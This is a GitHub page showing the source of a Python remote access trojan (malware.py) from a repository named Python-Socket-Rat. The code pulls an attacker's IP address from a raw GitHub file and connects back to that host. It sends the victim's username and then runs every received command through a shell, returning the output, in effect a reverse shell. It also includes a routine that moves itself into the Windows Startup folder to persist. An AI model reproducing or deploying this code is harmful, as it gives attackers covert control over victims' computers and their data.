Python-Socket-Rat/malware.py at main · fasshon/Python-Socket-Rat · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
try:
    import socket
    import subprocess
    import requests
    import os
    import shutil
    import threading
except:
    import os
    os.system('pip install socket subprocess requests shutil threading')
vbs_script = "malware.vbs"


#adds the entire malware collection to the startup folder
# |
# |
# V
def movedir():
    user = subprocess.check_output("whoami", shell=True, text=True)
    user = user[-6:].strip()
    print(user)
    currectdir = os.getcwd()
    startup = f"C:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
    if os.path.exists(f"C:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"):
        shutil.move(f"{currectdir}\\malware.py", f"{startup}\\malware.py")
        shutil.move(f"{currectdir}\\malware.vbs", f"{startup}\\malware.vbs")
    else:
        pass


def whoami(*args):
    print("opened who am i")
    socket = args[0]
    user = subprocess.check_output("whoami", shell=True, text=True, stderr=subprocess.STDOUT)
    print(f"user: {user}")
    user = user[-6:].strip()
    print(f"User after strip: {user}")
    socket.sendall(user.encode())
    print("sent?")

def client():
    link = "https://raw.githubusercontent.com/80dropz/communication/refs/heads/main/ipv4.txt"
    data = requests.get(link)
    hostip = data.text.strip()
    port = 65432
    while True:
        try:
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((hostip, port))
            break
        except:
            print("trying to connect")
    print(f"Connected to server at {hostip}:{port}")

    whoamithread = threading.Thread(target=whoami, args=(client_socket,))
    whoamithread.start()
    print("ran past the whoami")
    while True:
        command = client_socket.recv(1024).decode()
        if command.lower() == 'exit':
            print("Closing connection.")
            break
        try:
            result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
            client_socket.sendall(result)
        except subprocess.CalledProcessError as e:
            client_socket.sendall(f"Error executing command: {e.output}".encode())
    client_socket.close()


if __name__ == "__main__":
    client()